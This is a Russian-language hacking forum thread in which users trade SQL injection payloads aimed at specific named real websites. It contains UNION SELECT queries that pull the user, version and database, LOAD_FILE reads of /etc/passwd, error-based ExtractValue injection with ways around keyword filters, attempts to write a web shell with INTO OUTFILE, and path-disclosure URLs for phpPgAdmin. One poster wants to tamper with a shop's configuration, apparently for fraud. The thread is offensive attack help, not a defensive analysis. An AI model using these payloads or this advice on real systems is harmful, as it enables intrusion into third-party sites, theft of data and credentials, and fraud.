А можно ли че нить сделать с этим http://www.printcopy.info/index.php?l=ru&mod=docs&brand=Canon&gID=17416'
_http://www.printcopy.info/index.php?l=ru&mod=docs&brand=Canon&gID=-17416'+UNION+SELECT+1,USER(),VERSION(),4,DATABASE(),6,7,8,9,10+--+
http://www.besedin.com/zerkalo/foto.php?id=-6075%27+union+select+1,LOAD_FILE%28%27/etc/passwd%27%29,3,4,5+from+mysql.user--+ не могу найти пути Помогите плз
День добрый, есть линк отлично работает. нужно проапдейтить ConfigValue, update после юниона не канает можно ли сделать что-то вроде как быть? *линк пмну, это бескартонный шоп, но нужен =__=
Есть SQL-INJ PHP: and ExtractValue(1,concat(0x5c,(select version())))--+ фильтруются слова union|where|table_name|user|column_name|, самое главное это table_name, какими способами возможно обойти фильтр на слово table_name, ибо узнать таблицу с админа не как не удается.. делал PHP: and ExtractValue(1,concat(0x5c,(select unhex(0x7461626C655F6E616D65) from information_schema.tables limit 16,1)))--+ результата не дало..
Возможно ли здесь обойти фильтрацию select? Code: http://www.bestbets.org/bets/bet.php?id=-27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+--+
Помогите разобраться с этим постом https://forum.antichat.ru/showpost.php?p=1304326&postcount=93 Не могу понять одного ... Code: id=1+and+1=if(load_file('/etc/passwd')+is+not+NULL,1,2)--+ Что значит +is+not+NULL,1,2 и зависит ли такой запрос от кол-во колонок ? И где можно почитать про под запросы?
Если привелегия file_priv есть, то тогда Code: if(load_file('/etc/passwd')+is+not+NULL,1,2) превратится в 1 и финальный запрос будет выглядить как ... Code: id=1+and+1=1--+ то есть условие будет верно. В противном случае будет 2 и условие не сработает, то есть Code: id=1+and+1=2--+
Подскажите как можно залить шелл через такой инклуд? PHP: <?php // get variables $fn=explode('/',$_GET["path"]); $saveName = stripslashes($fn[0]); $savePath = stripslashes($_GET["path"]); // send headers to initiate a binary download header("Content-Type: application/pdf"); header("Content-Disposition: attachment; filename=$saveName"); header("Content-Transfer-Encoding: binary"); header("Content-length: " . filesize($savePath)); // read file readfile($savePath); ?>
Алкорайдер, где ты там инкуд увидел? UPD: Вроде справился с двойным запросом при заливки шелла, файл создается, но вот только почему то с содержанием 1 или 0 Если select 'test' то пишется в файл 0 Если select 123 то пишется в файл 1 сам запрос выглядит так select COUNT(CODE) as count1 from tbl_base where ISMODER=1 and (SUBKAT1=".$rs['CODE']." or SUBKAT2=".$rs['CODE']." or SUBKAT3=".$rs['CODE'] Делаю так 53 and if((select 123 into outfile '/tmp/test7.txt'),53,54)=53
Подскажите, какие уязвимости есть в phpPgAdmin 4.2.2 (PHP 4.4.9). Можно ли как нибудь авторизироватся? И вообще можно ли залить шелл через нее?
раскрытие путей: http://site.com/phpPgAdmin/sqledit.php?server[]=%3A5432%3Aallow&action=sql http://site.com/phpPgAdmin/libraries/lib.inc.php